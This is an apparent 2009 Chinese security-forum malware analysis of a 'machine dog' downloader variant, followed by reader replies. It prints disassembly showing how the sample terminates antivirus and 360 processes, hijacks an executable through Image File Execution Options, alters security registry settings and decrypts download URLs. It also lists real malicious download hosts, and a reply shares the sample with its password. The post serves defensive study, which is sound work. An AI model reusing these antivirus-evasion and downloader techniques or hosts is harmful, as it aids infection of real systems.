首页
论坛
专栏
课程

[原创]最新机器狗变种分析gr.exe

2009-1-21 09:51 22871

[原创]最新机器狗变种分析gr.exe

2009-1-21 09:51
22871
一、病毒标签:
病毒名称:  机器狗最新变种
病毒类型:  下载者
文件SHA1: 11e187662e89fdf5c200f8fbab1672558461e0ce
危害等级:  3
文件长度:  脱壳前37,205 字节,脱壳后130,501 字节
受影响系统:Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Services Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
开发工具: Microsoft Visual C++ 6.0
加壳类型: FSG 2.0 -> bart/xt
二、病毒描述:
    该病毒运行会关闭杀软,大量下载病毒木马。
三、行为分析:
1、遍历进程,创建一个名为puuyt互斥体,临时路径释放98989898文件
push    ebp
seg001:00416892                 mov     ebp, esp
seg001:00416894                 sub     esp, 1Ch
seg001:00416897                 call    sub_4167D3      ; 遍历进程
seg001:0041689C                 cmp     eax, 0Ah
seg001:0041689F                 jnb     short loc_4168A5
seg001:004168A1                 xor     eax, eax
seg001:004168A3                 leave
seg001:004168A4                 retn
seg001:004168A5 ; ---------------------------------------------------------------------------
seg001:004168A5
seg001:004168A5 loc_4168A5:                             ; CODE XREF: start+E j
seg001:004168A5                 push    esi             ; hWnd
seg001:004168A6                 push    edi             ; lpMsg
seg001:004168A7                 push    offset aPuuyt   ; "puuyt"
seg001:004168AC                 xor     esi, esi
seg001:004168AE                 push    1               ; bInitialOwner
seg001:004168B0                 push    esi             ; lpMutexAttributes
seg001:004168B1                 call    CreateMutexA    ; 创建一个名为puuyt互斥体
seg001:004168B7                 call    GetLastError
seg001:004168BD                 cmp     eax, 0B7h
seg001:004168C2                 jnz     short loc_4168CB
seg001:004168C4                 push    esi             ; uExitCode
seg001:004168C5                 call    ExitProcess
seg001:004168CB ; ---------------------------------------------------------------------------
seg001:004168CB
seg001:004168CB loc_4168CB:                             ; CODE XREF: start+31 j
seg001:004168CB                 mov     edi, offset BinaryPathName
seg001:004168D0                 push    edi             ; lpBuffer
seg001:004168D1                 push    104h            ; nBufferLength
seg001:004168D6                 call    __imp_GetTempPathA
seg001:004168DC                 push    offset a98989898 ; "98989898"
seg001:004168E1                 push    edi             ; lpString1
seg001:004168E2                 call    __imp_lstrcatA
seg001:004168E8                 push    edi             ; lpFileName
seg001:004168E9                 call    sub_4161A0      ; 临时路径创建98989898文件
seg001:004168EE                 test    al, al
seg001:004168F0                 pop     ecx
seg001:004168F1                 jz      short loc_4168FF
seg001:004168F3                 push    edi             ; NumberOfBytesWritten
seg001:004168F4                 call    sub_416849      ; 设置文件指针

2、
遍历以下进程,如存在则结束;劫持Thunder5.exe。
seg001:00415F30 ; kavstart.exe
seg001:00415F30 ;
seg001:00415F30 ; kissvc.exe
seg001:00415F30 ;
seg001:00415F30 ; kmailmon.exe
seg001:00415F30 ;
seg001:00415F30 ; kpfw32.exe
seg001:00415F30 ;
seg001:00415F30 ; kpfwsvc.exe
seg001:00415F30 ;
seg001:00415F30 ; kwatch.exe
seg001:00415F30 ;
seg001:00415F30 ; ccenter.exe
seg001:00415F30 ;
seg001:00415F30 ; ras.exe
seg001:00415F30 ;
seg001:00415F30 ; rstray.exe
seg001:00415F30 ;
seg001:00415F30 ; rsagent.exe
seg001:00415F30 ;
seg001:00415F30 ; ravtask.exe
seg001:00415F30 ;
seg001:00415F30 ; ravstub.exe
seg001:00415F30 ;
seg001:00415F30 ; ravmon.exe
seg001:00415F30 ;
seg001:00415F30 ; ravmond.exe
seg001:00415F30 ;
seg001:00415F30 ; avp.exe
seg001:00415F30 ;
seg001:00415F30 ; 360safebox.exe
seg001:00415F30 ;
seg001:00415F30 ; 360Safe.exe
seg001:00415F30 ;
seg001:00415F30 ; Thunder5.exe
seg001:00415F30 ;
seg001:00415F30 ; rfwmain.exe
seg001:00415F30 ;
seg001:00415F30 ; rfwstub.exe
seg001:00415F30 ;
seg001:00415F30 ; rfwsrv.exe

劫持Thunder5.exe:
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\

3、修改360注册表键值
seg001:004150AA                 mov     esi, offset aSoftware360saf ; SOFTWARE\360Safe\safemon
seg001:004150AF                 lea     edi, [esp+78h+SubKey]
seg001:004150B3                 xor     eax, eax
seg001:004150B5                 rep movsd
seg001:004150B7                 movsb
seg001:004150B8                 mov     ecx, 12h
seg001:004150BD                 lea     edi, [esp+78h+var_4B]
seg001:004150C1                 rep stosd
seg001:004150C3                 stosw
seg001:004150C5                 lea     eax, [esp+78h+hKey]
seg001:004150C9                 lea     ecx, [esp+78h+SubKey]
seg001:004150CD                 push    eax             ; phkResult
seg001:004150CE                 push    ecx             ; lpSubKey
seg001:004150CF                 push    80000002h       ; hKey
seg001:004150D4                 mov     dword ptr [esp+84h+Data], 0
seg001:004150DC                 mov     [esp+84h+var_68], 1
seg001:004150E4                 call    RegCreateKeyA
seg001:004150EA                 mov     eax, [esp+78h+hKey]
seg001:004150EE                 mov     esi, RegSetValueExA
seg001:004150F4                 lea     edx, [esp+78h+Data]
seg001:004150F8                 push    4               ; cbData
seg001:004150FA                 push    edx             ; lpData
seg001:004150FB                 push    4               ; dwType
seg001:004150FD                 push    0               ; Reserved
seg001:004150FF                 push    offset ValueName ; "MonAccess"
seg001:00415104                 push    eax             ; hKey
seg001:00415105                 call    esi ; RegSetValueExA
seg001:00415107                 mov     edx, [esp+78h+hKey]
seg001:0041510B                 lea     ecx, [esp+78h+Data]
seg001:0041510F                 push    4               ; cbData
seg001:00415111                 push    ecx             ; lpData
seg001:00415112                 push    4               ; dwType
seg001:00415114                 push    0               ; Reserved
seg001:00415116                 push    offset aSiteaccess ; "SiteAccess"
seg001:0041511B                 push    edx             ; hKey
seg001:0041511C                 call    esi ; RegSetValueExA
seg001:0041511E                 mov     ecx, [esp+78h+hKey]
seg001:00415122                 lea     eax, [esp+78h+Data]
seg001:00415126                 push    4               ; cbData
seg001:00415128                 push    eax             ; lpData
seg001:00415129                 push    4               ; dwType
seg001:0041512B                 push    0               ; Reserved
seg001:0041512D                 push    offset aExecaccess ; "ExecAccess"
seg001:00415132                 push    ecx             ; hKey
seg001:00415133                 call    esi ; RegSetValueExA
seg001:00415135                 mov     eax, [esp+78h+hKey]
seg001:00415139                 lea     edx, [esp+78h+Data]
seg001:0041513D                 push    4               ; cbData
seg001:0041513F                 push    edx             ; lpData
seg001:00415140                 push    4               ; dwType
seg001:00415142                 push    0               ; Reserved
seg001:00415144                 push    offset aArpaccess ; "ARPAccess"
seg001:00415149                 push    eax             ; hKey
seg001:0041514A                 call    esi ; RegSetValueExA
seg001:0041514C                 mov     edx, [esp+78h+hKey]
seg001:00415150                 lea     ecx, [esp+78h+Data]
seg001:00415154                 push    4               ; cbData
seg001:00415156                 push    ecx             ; lpData
seg001:00415157                 push    4               ; dwType
seg001:00415159                 push    0               ; Reserved
seg001:0041515B                 push    offset aWeeken  ; "weeken"
seg001:00415160                 push    edx             ; hKey
seg001:00415161                 call    esi ; RegSetValueExA
seg001:00415163                 mov     ecx, [esp+78h+hKey]
seg001:00415167                 lea     eax, [esp+78h+Data]
seg001:0041516B                 push    4               ; cbData
seg001:0041516D                 push    eax             ; lpData
seg001:0041516E                 push    4               ; dwType
seg001:00415170                 push    0               ; Reserved
seg001:00415172                 push    offset aIeprotaccess ; "IEProtAccess"
seg001:00415177                 push    ecx             ; hKey
seg001:00415178                 call    esi ; RegSetValueExA
seg001:0041517A                 lea     edx, [esp+78h+var_68]
seg001:0041517E                 push    4               ; cbData
seg001:00415180                 push    edx             ; lpData
seg001:00415181                 push    4               ; dwType
seg001:00415183                 push    0               ; Reserved
seg001:00415185                 push    offset aLeakshowed ; "LeakShowed"
seg001:0041518A                 mov     eax, [esp+8Ch+hKey]
seg001:0041518E                 push    eax             ; hKey
seg001:0041518F                 call    esi ; RegSetValueExA
seg001:00415191                 mov     edx, [esp+78h+hKey]
seg001:00415195                 lea     ecx, [esp+78h+var_68]
seg001:00415199                 push    4               ; cbData
seg001:0041519B                 push    ecx             ; lpData
seg001:0041519C                 push    4               ; dwType
seg001:0041519E                 push    0               ; Reserved
seg001:004151A0                 push    offset aUdiskaccess ; "UDiskAccess"
seg001:004151A5                 push    edx             ; hKey
seg001:004151A6                 call    esi ; RegSetValueExA
seg001:004151A8                 mov     eax, [esp+78h+hKey]
seg001:004151AC                 push    eax             ; hKey
seg001:004151AD                 call    RegCloseKey
seg001:004151B3                 pop     edi
seg001:004151B4                 pop     esi
seg001:004151B5                 add     esp, 70h
seg001:004151B8                 retn

4、干掉360进程
seg001:00415580                 sub     esp, 130h
seg001:00415586                 push    ebp
seg001:00415587                 push    offset aSTO     ; "檎卣雄饧嘏蹘迷?
seg001:0041558C                 call    sub_415020      ; safeboxTray.exe
seg001:00415591                 push    offset aIkvfrUc ; "┆嗤銝塑?
seg001:00415596                 call    sub_415020      ; 360tray.exe
seg001:0041559B                 push    offset aCcR     ; "骁余讱卧?
seg001:004155A0                 call    sub_415020      ; psapi.dll
seg001:004155A5                 push    offset CommandLine ; "枺?
seg001:004155AA                 call    sub_415020      ;  /u
seg001:004155AF                 add     esp, 10h
seg001:004155B2                 push    0               ; th32ProcessID
seg001:004155B4                 push    2               ; dwFlags
seg001:004155B6                 call    CreateToolhelp32Snapshot
seg001:004155BB                 mov     ebp, eax
seg001:004155BD                 cmp     ebp, 0FFFFFFFFh
seg001:004155C0                 jz      loc_415737
seg001:004155C6                 lea     eax, [esp+134h+pe]
seg001:004155CA                 push    esi
seg001:004155CB                 push    eax             ; lppe
seg001:004155CC                 push    ebp             ; hSnapshot
seg001:004155CD                 mov     [esp+140h+pe.dwSize], 128h
seg001:004155D5                 call    Process32First
seg001:004155DA                 test    eax, eax
seg001:004155DC                 jz      loc_415711
seg001:004155E2                 mov     esi, lstrcmpiA
seg001:004155E8                 lea     ecx, [esp+138h+pe.szExeFile]
seg001:004155EC                 push    offset aSTO     ; "檎卣雄饧嘏蹘迷?
seg001:004155F1                 push    ecx             ; lpString1
seg001:004155F2                 call    esi ; lstrcmpiA
seg001:004155F4                 test    eax, eax
seg001:004155F6                 jz      short loc_41561B
seg001:004155F8
seg001:004155F8 loc_4155F8:                             ; CODE XREF: sub_415580+99 j
seg001:004155F8                 lea     edx, [esp+138h+pe]
seg001:004155FC                 push    edx             ; lppe
seg001:004155FD                 push    ebp             ; hSnapshot
seg001:004155FE                 call    Process32Next
seg001:00415603                 test    eax, eax
seg001:00415605                 jz      loc_415711
seg001:0041560B                 lea     eax, [esp+138h+pe.szExeFile]
seg001:0041560F                 push    offset aSTO     ; "檎卣雄饧嘏蹘迷?
seg001:00415614                 push    eax             ; lpString1
seg001:00415615                 call    esi ; lstrcmpiA
seg001:00415617                 test    eax, eax
seg001:00415619                 jnz     short loc_4155F8 ; 进程是否存在 safeboxTray.exe
seg001:0041561B
seg001:0041561B loc_41561B:                             ; CODE XREF: sub_415580+76 j
seg001:0041561B                 mov     ecx, [esp+138h+pe.th32ProcessID]
seg001:0041561F                 push    ebx             ; lpFileName
seg001:00415620                 push    ecx             ; dwProcessId
seg001:00415621                 push    0               ; bInheritHandle
seg001:00415623                 push    410h            ; dwDesiredAccess
seg001:00415628                 call    OpenProcess
seg001:0041562E                 mov     ebx, eax
seg001:00415630                 test    ebx, ebx
seg001:00415632                 jz      loc_4156FE
seg001:00415638                 lea     edx, [esp+13Ch+cbNeeded]
seg001:0041563C                 push    edi
seg001:0041563D                 push    edx             ; lpcbNeeded
seg001:0041563E                 lea     eax, [esp+144h+hObject]
seg001:00415642                 push    4               ; cb
seg001:00415644                 push    eax             ; lphModule
seg001:00415645                 push    ebx             ; hProcess
seg001:00415646                 call    EnumProcessModules
seg001:0041564B                 mov     ecx, [esp+140h+hObject]
seg001:0041564F                 push    104h            ; nSize
seg001:00415654                 push    offset ApplicationName ; lpFilename
seg001:00415659                 push    ecx             ; hModule
seg001:0041565A                 push    ebx             ; hProcess
seg001:0041565B                 call    GetModuleFileNameExA
seg001:00415660                 mov     edi, offset ApplicationName
seg001:00415665                 or      ecx, 0FFFFFFFFh
seg001:00415668                 xor     eax, eax
seg001:0041566A                 mov     esi, offset ApplicationName
seg001:0041566F                 repne scasb
seg001:00415671                 not     ecx
seg001:00415673                 dec     ecx
seg001:00415674                 mov     edi, offset aSTO ; "檎卣雄饧嘏蹘迷?
seg001:00415679                 mov     edx, ecx
seg001:0041567B                 or      ecx, 0FFFFFFFFh
seg001:0041567E                 repne scasb
seg001:00415680                 not     ecx
seg001:00415682                 dec     ecx
seg001:00415683                 mov     edi, offset FileName
seg001:00415688                 sub     edx, ecx
seg001:0041568A                 push    offset FileName ; lpFileName
seg001:0041568F                 mov     ecx, edx
seg001:00415691                 mov     eax, ecx
seg001:00415693                 shr     ecx, 2
seg001:00415696                 rep movsd
seg001:00415698                 mov     ecx, eax
seg001:0041569A                 xor     eax, eax
seg001:0041569C                 and     ecx, 3
seg001:0041569F                 rep movsb
seg001:004156A1                 mov     edi, offset aCcR ; "骁余讱卧?
seg001:004156A6                 or      ecx, 0FFFFFFFFh
seg001:004156A9                 repne scasb
seg001:004156AB                 not     ecx
seg001:004156AD                 sub     edi, ecx
seg001:004156AF                 mov     esi, edi
seg001:004156B1                 mov     edx, ecx
seg001:004156B3                 mov     edi, offset FileName
seg001:004156B8                 or      ecx, 0FFFFFFFFh
seg001:004156BB                 repne scasb
seg001:004156BD                 mov     ecx, edx
seg001:004156BF                 dec     edi
seg001:004156C0                 shr     ecx, 2
seg001:004156C3                 rep movsd
seg001:004156C5                 mov     ecx, edx
seg001:004156C7                 and     ecx, 3
seg001:004156CA                 rep movsb
seg001:004156CC                 call    sub_414F40
seg001:004156D1                 add     esp, 4
seg001:004156D4                 test    al, al


5、C:\WINDOWS\Tasks释放1文件,该文件其实是一个dll,主要从http://{blocked}www.hoho-2.cn/down/gr.exe下载者病毒
seg001:0041691D                 call    sub_41630E      ; C:\WINDOWS\Tasks释放1文件

6、遍历磁盘分区,查找exe文件
push    esi             ; lpThreadId
seg001:0041692B                 push    esi             ; dwCreationFlags
seg001:0041692C                 push    esi             ; lpParameter
seg001:0041692D                 push    offset find_file_exe ; lpStartAddress
seg001:00416932                 push    esi             ; dwStackSize
seg001:00416933                 push    esi             ; lpThreadAttributes
seg001:00416934                 call    CreateThread


7、查找AfxControlBar42s窗口,修改注册表键值,关闭“显示隐藏文件”
push    7D0h            ; dwMilliseconds
seg001:00416205                 call    Sleep
seg001:0041620B                 push    offset szWindow ; lpszWindow
seg001:00416210                 push    offset szClass  ; "AfxControlBar42s"
seg001:00416215                 call    sub_416070      ; 查找AfxControlBar42s窗口
seg001:0041621A                 pop     ecx
seg001:0041621B                 pop     ecx
seg001:0041621C                 call    sub_4160ED      ; 修改注册表值
seg001:00416221                 jmp     short modify_reg

进入 call    sub_4160ED      ; 修改注册表值:
mov     esi, offset aSoftwareMicr_0 ; Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
seg001:004160FC                 pop     ecx
seg001:004160FD                 lea     edi, [ebp+SubKey]
seg001:00416100                 rep movsd
seg001:00416102                 push    9
seg001:00416104                 xor     eax, eax
seg001:00416106                 pop     ecx
seg001:00416107                 lea     edi, [ebp+var_38]
seg001:0041610A                 rep stosd
seg001:0041610C                 stosw
seg001:0041610E                 and     [ebp+var_10], 0
seg001:00416112                 mov     dword ptr [ebp+Data], 2
seg001:00416119                 stosb
seg001:0041611A                 lea     eax, [ebp+hKey]
seg001:0041611D                 mov     [ebp+var_C], 1
seg001:00416124                 push    eax             ; phkResult
seg001:00416125                 lea     eax, [ebp+SubKey]
seg001:00416128                 push    eax             ; lpSubKey
seg001:00416129                 push    80000001h       ; hKey
seg001:0041612E                 call    RegCreateKeyA
seg001:00416134                 push    4
seg001:00416136                 lea     eax, [ebp+Data]
seg001:00416139                 pop     edi
seg001:0041613A                 mov     esi, RegSetValueExA
seg001:00416140                 push    edi             ; cbData
seg001:00416141                 push    eax             ; lpData
seg001:00416142                 push    edi             ; dwType
seg001:00416143                 push    0               ; Reserved
seg001:00416145                 push    offset aHidden  ; "Hidden"
seg001:0041614A                 push    [ebp+hKey]      ; hKey
seg001:0041614D                 call    esi ; RegSetValueExA
seg001:0041614F                 lea     eax, [ebp+var_C]
seg001:00416152                 push    edi             ; cbData
seg001:00416153                 push    eax             ; lpData
seg001:00416154                 push    edi             ; dwType
seg001:00416155                 push    0               ; Reserved
seg001:00416157                 push    offset aSuperhidden ; "SuperHidden"
seg001:0041615C                 push    [ebp+hKey]      ; hKey
seg001:0041615F                 call    esi ; RegSetValueExA
seg001:00416161                 lea     eax, [ebp+var_10]
seg001:00416164                 push    edi             ; cbData
seg001:00416165                 push    eax             ; lpData
seg001:00416166                 push    edi             ; dwType
seg001:00416167                 push    0               ; Reserved
seg001:00416169                 push    offset aShowsuperhidde ; "ShowSuperHidden"
seg001:0041616E                 push    [ebp+hKey]      ; hKey
seg001:00416171                 call    esi ; RegSetValueExA
seg001:00416173                 push    [ebp+hKey]      ; hKey
seg001:00416176                 call    RegCloseKey
seg001:0041617C                 pop     edi
seg001:0041617D                 pop     esi
seg001:0041617E                 leave


8、干掉cmd.exe
push    offset Str1     ; "cmd.exe"
seg001:00414B47                 call    _stricmp
seg001:00414B4C                 pop     ecx
seg001:00414B4D                 test    eax, eax
seg001:00414B4F                 pop     ecx
seg001:00414B50                 jnz     short loc_414B33
seg001:00414B52                 push    dword ptr [esi+8] ; dwProcessId
seg001:00414B55                 push    eax             ; bInheritHandle
seg001:00414B56                 push    1               ; dwDesiredAccess
seg001:00414B58                 call    OpenProcess
seg001:00414B5E                 push    0               ; uExitCode
seg001:00414B60                 push    eax             ; hProcess
seg001:00414B61                 call    TerminateProcess

9、释放随机dll文件

         
seg001:00415E30                 push    eax             ; lpBuffer
seg001:00415E31                 push    104h            ; nBufferLength
seg001:00415E36                 call    __imp_GetTempPathA ; 找到临时路径
seg001:00415E3C                 call    __imp_GetTickCount
seg001:00415E42                 push    eax
seg001:00415E43                 lea     eax, [ebp+Buffer]
seg001:00415E49                 push    eax
seg001:00415E4A                 mov     esi, offset byte_4169EC
seg001:00415E4F                 push    offset aSX_dll  ; "%s%x.dll"
seg001:00415E54                 push    esi             ; LPSTR
seg001:00415E55                 call    wsprintfA
seg001:00415E5B                 push    esi             ; lpFileName
seg001:00415E5C                 call    sub_414AB4      ; 释放随机命名的dll文件
seg001:00415E61                 add     esp, 14h

10、下载者列表:

seg001:00415E71                 push    offset aOlojvssfysgvqn ; "防蕉}ol様YS儌QNLI>px6kfrhYX P_Y"
seg001:00415E76                 call    sub_414FA0      ; 解密call,解密后为http://tongji1.ac5566.cn/getmac.asp
seg001:00415E7B                 mov     [esp+114h+var_114], offset dword_4144EC
seg001:00415E82                 call    sub_414FA0      ; 解密call,解密后为http://txt.naiws.com/oo.txt
seg001:00415E87                 call    sub_415750      ; 调用URLDownloadToFileA函数下载列表上的病毒
seg001:00415E8C                 mov     esi, Sleep
seg001:00415E92                 mov     [esp+114h+var_114], 0C350h
seg001:00415E99                 call    esi ; Sleep
seg001:00415E9B                 push    offset dword_4145C0
seg001:00415EA0                 call    sub_414FA0      ; 解密call,解密后为http://txt.naiws.com/ad.jpg
seg001:00415EA5                 pop     ecx
seg001:00415EA6                 call    sub_415BE0      ; 修改hosts文件
seg001:00415EAB                 call    sub_4151DD      ; 继续解密,获得Netbios信息
seg001:00415EB0                 mov     edi, 1F4h
seg001:00415EB5                 push    edi             ; dwMilliseconds

sadfasdf.jpg实际是一个列表文件,内容:
[file]	
open=y
url1=http://www.wixks.com/new/new1.exe
url2=http://www.wixks.com/new/new2.exe
url3=http://www.wixks.com/new/new3.exe
url4=http://www.wixks.com/new/new4.exe
url5=http://www.wixks.com/new/new5.exe
url6=http://www.wixks.com/new/new6.exe
url7=http://www.wixks.com/new/new7.exe
url8=http://www.wixks.com/new/new8.exe
url9=http://www.wixks.com/new/new9.exe
url10=http://www.wixks.com/new/new10.exe
url11=http://www.wixks.com/new/new11.exe
url12=http://www.wixks.com/new/new12.exe
url13=http://www.wixks.com/new/new13.exe
url14=http://www.wixks.com/new/new14.exe
url15=http://www.wixks.com/new/new15.exe
url16=http://www.wixks.com/new/new16.exe
url17=http://www.wixks.com/new/new17.exe
url18=http://www.wixks.com/new/new18.exe
url19=http://www.wixks.com/new/new19.exe
url20=http://www.wixks.com/new/new20.exe
url21=http://www.wixks.com/new/new21.exe
url22=http://www.wixks.com/new/new22.exe
url23=http://www.wixks.com/new/new23.exe
url24=http://www.wixks.com/new/new24.exe
url25=http://www.wixks.com/new/new25.exe
url26=http://www.wixks.com/new/new26.exe
url27=http://www.wixks.com/new/new27.exe
url28=http://www.wixks.com/new/new28.exe
count=28

11、提权
call    sub_416223      ; 提权

12、创建一个名为Kisstusb的服务,完成后清除该服务
seg001:004166C9                 push    offset ServiceName ; "Kisstusb"
seg001:004166CE                 call    sub_416402      ; 创建一个名为Kisstusb的服务
seg001:004166D3                 mov     esi, eax
seg001:004166D5                 pop     ecx
seg001:004166D6                 test    esi, esi
seg001:004166D8                 pop     ecx
seg001:004166D9                 jz      short loc_416702
seg001:004166DB                 lea     eax, [ebp+ServiceStatus]
seg001:004166DE                 push    eax             ; lpServiceStatus
seg001:004166DF                 push    esi             ; hService
seg001:004166E0                 call    QueryServiceStatus
seg001:004166E6                 test    eax, eax
seg001:004166E8                 jz      short loc_4166F0
seg001:004166EA                 cmp     [ebp+ServiceStatus.dwCurrentState], 4
seg001:004166EE                 jz      short loc_4166FB
seg001:004166F0
seg001:004166F0 loc_4166F0:                             ; CODE XREF: sub_4166BF+29 j
seg001:004166F0                 push    0               ; lpServiceArgVectors
seg001:004166F2                 push    0               ; dwNumServiceArgs
seg001:004166F4                 push    esi             ; hService
seg001:004166F5                 call    StartServiceA   ; 启动服务
seg001:004166FB
seg001:004166FB loc_4166FB:                             ; CODE XREF: sub_4166BF+2F j
seg001:004166FB                 push    esi             ; hSCObject
seg001:004166FC                 call    CloseServiceHandle
seg001:00416702
seg001:00416702 loc_416702:                             ; CODE XREF: sub_4166BF+1A j
seg001:00416702                 push    [ebp+lpBinaryPathName] ; lpFileName
seg001:00416705                 call    DeleteFileA
seg001:0041670B                 push    offset pszSubKey ; SYSTEM\CurrentControlSet\Services\Kisstusb
seg001:00416710                 push    80000002h       ; hkey
seg001:00416715                 call    SHDeleteKeyA    ; 清除该服务


[公告]安全服务和外包项目请将项目需求发到看雪企服平台:https://qifu.kanxue.com

上传的附件:
最新回复 (53)
asd 2009-1-21 09:57
2
0
十分强大 学习了
combojiang 26 2009-1-21 10:56
3
0
嗯,不错。我看过类似的样本。这个过不了主动防御。
newjueqi 7 2009-1-21 11:14
4
0
来学习的
jwasami 2009-1-21 11:30
5
0
学习看雪大牛的作品!!!
小娃崽 13 2009-1-21 12:07
6
0
坐书生的屁股~!我不乖~!
sudami 25 2009-1-21 12:41
7
0
谢谢分享,建议把样本一起贴出来啊
dayang 2009-1-21 16:07
8
0
说的是 机器狗,怎么没穿还原部分的?
petnt 12 2009-1-21 16:22
9
0
刚好我也在看这个病毒,原来这就是机器狗啊
据说AfxControlBar42s是在查黑冰
还有好像他会干掉任务管理器。
我的系统因为他变得奇慢,OD也跑不动了,昨天用别人的电脑调试了一会。
今天只有我本本一个了,逼着我重装了系统。
我再继续努力努力。。。
asd 2009-1-21 16:47
10
0
临时路径创建98989898文件就是driver部分

所以的样本
密码:virus
上传的附件:
machoman 1 2009-1-21 16:52
11
0
强帖要留名。机器狗真厉害。
dayang 2009-1-21 17:20
12
0
int __cdecl sub_41671E()
{
  HANDLE v0; // eax@1
  void *v1; // edi@1
  CHAR ExistingFileName; // [sp+8h] [bp-108h]@1
  DWORD BytesReturned; // [sp+10Ch] [bp-4h]@2

  GetModuleFileNameA(0, &ExistingFileName, 0x104u);
  Sleep(0xEA60u);
  MessageBoxA((HWND)0xFFFFFFFF, "...", szWindow, 0);
  CreateThread(0, 0, (DWORD (__stdcall *)(LPVOID))sub_415E20, 0, 0, 0);
  MoveFileExA(&ExistingFileName, 0, 4u);
  sub_416223();
  sub_4166BF(BinaryPathName);
  v0 = CreateFileA("\\\\.\\Delkil", 0x80000000u, 0, 0, 3u, 0, 0);
  v1 = v0;
  if ( v0 != (HANDLE)-1 )
    DeviceIoControl(v0, 0x22001Cu, dword_4104EC, 0x3400u, 0, 0, &BytesReturned, 0);
  CloseHandle(v1);
  return 0;
}
驱动通讯部分,一直不知道0x22001Cu这里的CTL_CODE怎么计算回去,呵呵
Fido 2009-1-21 17:41
13
0
.............膜拜....牛必啊!!!!!!!!!!!!!.....
清新阳光 2009-1-21 23:07
14
0
记得 还有这么个过程 遍历所有非移动磁盘 生成usp10.dll 进行dll劫持 之前看过这样的样本
小衣 2009-1-22 04:52
15
0
看的有点晕。谢谢分享
cater 5 2009-1-22 08:20
16
0
书生,你曾经对我说
Lenus 3 2009-1-22 15:37
17
0
这个样本有循环下载。

邪恶的psapi.dll
eyeego 2009-1-23 17:01
18
0
就是那段枚举exe的
有可执行文件的路径它才会释放usp10.dll,比吸血鬼的高明多了。。。
无聊之际 2009-1-24 00:02
19
0
下载附件的时候ESS就提示了...学习一下
xPLK 3 2009-1-24 00:10
20
0
今天我也分析了一下

usp10.dll里面的代码就是循环下载的。


今天看到这个才去研究了一下:http://www.scanw.com/blog/archives/355
yjdly 2009-1-24 09:57
21
0
牛年的牛贴,希望有牛人能写个牛程序来防止机器狗来穿透还原软件!
ljlLionel 2009-1-24 10:02
22
0
谢谢,学习了
nimda 1 2009-1-25 16:24
23
0
Kisstusb。。。。看着眼熟
最硬石头 2009-1-25 19:12
24
0
最近正好碰到这个
林芝宝 2009-1-25 20:30
25
0
这病毒是用什么 软件编的?
wanmeicpl 2009-1-27 13:08
26
0
我是看的非常晕
wanmeicpl 2009-1-27 16:56
27
0
一片茫然种啊
emtv 2009-1-28 20:38
28
0
不懂啊,晕,我什么时候也能样你这样
zhupf 2009-1-30 16:53
29
0
我已经中毒了好象.
lixupeng 2009-1-30 22:27
30
0
学习下
dayed 1 2009-1-31 00:28
31
0
[QUOTE=dayang;568210]int __cdecl sub_41671E()
{
  HANDLE v0; // eax@1
  void *v1; // edi@1
  CHAR ExistingFileName; // [sp+8h] [bp-108h]@1
  DWORD BytesReturned; // [...[/QUOTE]

解密回去干嘛,又不是不能用
劳伦半世 2009-1-31 03:51
32
0
直接膜拜。啥也看不懂。
dttom 3 2009-2-1 15:00
33
0
谢谢分享,学习了
dayang 2009-2-1 22:46
34
0
貌似感染了CTFMON。EXE吧,输入法不能用了,失败!
lumengyang 2009-2-2 14:06
35
0
............顶了
kidnapper 2009-2-2 22:10
36
0
强大,很  。。。。。。
piratelzs 2009-2-2 23:12
37
0
机器狗一般是病毒还是壳,貌似和外挂有联系。
panti 2009-2-11 15:51
38
0
崇拜冷血,我是你最忠诚的FANS
boainfall 2009-2-11 16:25
39
0
今天也看了这个样本,加密的地方太多了,而且加密的方法也有好多种, 真能折腾
wcnmdmm 2009-2-11 19:54
40
0
seg001:00415E71                 push    offset aOlojvssfysgvqn ; "防蕉}ol様YS儌QNLI>px6kfrhYX P_Y"
seg001:00415E76                 call    sub_414FA0      ; 解密call,解密后为http://tongji1.ac5566.cn/getmac.asp
上面这两段,知道了参数,再调用解密函数进行解密,最后解密的结果请问有没有什么工具能够直接显示出来?
lankerr 2009-2-12 00:56
41
0
明天打印来慢慢学...
phikaa 2009-2-12 17:16
42
0
金山是什么猫X病毒,360报的是X牛病毒。
万爱可 2009-2-13 12:50
43
0
没有看明白,新手
kang 2009-5-27 02:36
44
0
最重点的部分没有分析,
穿透还原的原理呢?
moonife 8 2009-5-27 10:50
45
0
这个还是比较强的说
骚包 2009-5-27 18:39
46
0
学习一下。。。
asmbulls 2009-9-24 16:49
47
0
谢谢分享!好好学习。。。。
lengxiaoya 2009-10-8 12:16
48
0
虽然看的不是很懂,但还是支持下
liuheqiang 2 2009-10-8 17:55
49
0
书生的东西得支持一下啊  分析的够辛苦的
feierin 2009-10-8 18:35
50
0
怎么去分析这病毒啊
中了这病毒之后电脑运行奇慢根本做不了什么
游客
登录 | 注册 方可回帖
返回